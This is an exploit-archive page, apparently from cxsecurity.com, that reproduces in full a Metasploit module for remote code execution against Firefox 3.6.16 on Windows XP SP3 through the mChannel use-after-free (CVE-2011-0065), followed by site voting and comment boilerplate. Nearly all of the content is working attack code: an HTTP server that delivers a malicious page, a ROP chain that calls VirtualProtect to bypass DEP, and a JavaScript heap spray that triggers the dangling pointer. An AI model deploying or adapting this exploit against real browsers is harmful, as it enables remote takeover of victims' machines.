Firefox 3.6.16 OBJECT mChannel Remote Code Execution Exploit (DEP bypass)

2011.08.08
Risk: High
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "3.6.16", :ua_maxver => "3.6.16", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free Exploit', 'Description' => %q{ This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3 }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', # discovery 'Rh0' # wrote metasploit module ], 'Version' => '0.0', 'References' => [ ['CVE', '2011-0065'], ['OSVDB', '72085'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'], ['URL', 'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "", }, 'Targets' => [ # worked with 100% reliability [ 'Firefox 3.6.16, Windows XP SP3 (VirtualBox 4)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 10 2011' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli).encoded) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) # DEP bypass custom_stack = [ 0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8 0x7c801ad4, # VirtualProtect 0xbeeff00d, 0xbeeff00d, 0x7c874413, # jmp esp 0x0c0c0048, # start address 0x00000400, # size 1024 0x00000040, # Page EXECUTE_READ_WRITE 0x0c0c0c00 # old protection ].pack("V*") payload_buf = '' payload_buf << custom_stack payload_buf << payload escaped_payload = Rex::Text.to_unescape(payload_buf) custom_js = %Q| e = document.getElementById("d"); e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0) fake_obj_addr = unescape("\\x0c%u0c0c") // taken and modified from adobe_flashplayer_newfunction.rb var sc = unescape("#{escaped_payload}") var ret_addr = unescape("%u0024%u0c0c") while(ret_addr.length+20+8 < 0x100000) {ret_addr += ret_addr} var b = ret_addr.substring(0,(0x48-0x24)/2) b += sc b += ret_addr var next = b.substring(0,0x10000/2) while(next.length<0x800000) {next += next} var again = next.substring(0,0x80000 - (0x1020-0x08)/2) array = new Array() for (n=0;n<0x1f0;n++){ array[n] = again + sc } e.data = "" | return %Q| <html> <body> <object id="d"><object> <script type="text/javascript"> #{custom_js} </script></body></html> | end end

References:

https://bugzilla.mozilla.org/show_bug.cgi?id=634986
http://www.mozilla.org/security/announce/2011/mfsa2011-13.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top